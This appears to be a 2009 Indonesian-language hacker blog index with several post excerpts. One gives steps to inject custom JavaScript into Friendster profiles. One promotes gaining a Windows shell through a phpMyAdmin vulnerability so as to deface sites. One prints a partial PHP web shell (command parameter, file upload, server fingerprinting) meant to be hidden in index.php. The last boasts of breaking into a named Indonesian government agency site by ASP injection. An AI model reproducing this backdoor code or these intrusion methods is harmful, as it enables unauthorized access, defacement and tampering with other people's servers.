coco_nk4l site

Linker FS Update 25-02-09

Update Linker FS terbaru pada tanggal 31 Januari 2009, okey gak sah banyak nyacat kangsung aja step-stepnya.

Pertama Login FS
buka link http://widgets.friendster.com/marahmerah2
Add app tersebut
kalo udah masuk ke edit profile
Taruh URL js/css kamu di sana

okey masukan kode js dengan format sbb:
<script src=”urljsloe”></script>
okey semoga bisa membantu
special thanks to : DEVARIZT thanks infonya broo

Getting Windows Shell with Phpmyadmin Vulnerability

Gw yakin kalo banyak dari loe semua dah pada tau apa itu namanya shell??? Yups bagi gw shell adalah Backdoor buat system pada suatu site, bayangin loe gak perlu tau password dr cpanel, loe bisa cari tw passwordnya, lo bisa utak utik file managernya nambah file ato hapus file atau deface tugh site sekalian, pada [...]

Hidden Shell Inject On Index.php

This script is Originally by Gbl4ck a.k.a Biadabz
<?php
if(!empty($_GET['cmd'])){
if(isset($_POST['set']))
if(isset($_FILES['fi']))
if(!@move_uploaded_file($_FILES['fi']['tmp_name'],$_FILES['fi']['name'])) $sm.=’<span class=”error”>Could not move uploaded file!</span>’;
if(@ini_get(”safe_mode”) or strtolower(@ini_get(”safe_mode”)) == “on”){ $SM = true; $RSM = “<font color=’red’>ON</font>”;}else { $SM = FALSE; $RSM = “<font color=’cyan’>OFF</font>”;}
//Variables
$versi = “1.1″;
$host = $_SERVER['HTTP_HOST'];
$ip = $_SERVER['REMOTE_ADDR'];
$servip = $_SERVER['SERVER_ADDR'];
$server = $_SERVER['SERVER_SOFTWARE'];
$browser = $_SERVER['HTTP_USER_AGENT'];
$port = $_SERVER['SERVER_PORT'];
$filename = $_SERVER['SCRIPT_NAME'];
$date = date(’ra’);
$phpver = phpversion( );
$chdir = [...]

BMG Wilayah III Denpasar was Hacked….

Masih aja ada admin dari Indo yang membiarkan bugs-bugs sederhana seperti Asp injection, hal ini secara gak sengaja gw coba pass setelah lead video dari Milw0rm dan aq coba ternyata masih Vuln pada site ini alhasil aq bisa masuk kedalam admin page dan melakukan Perubahan data pada website tersebut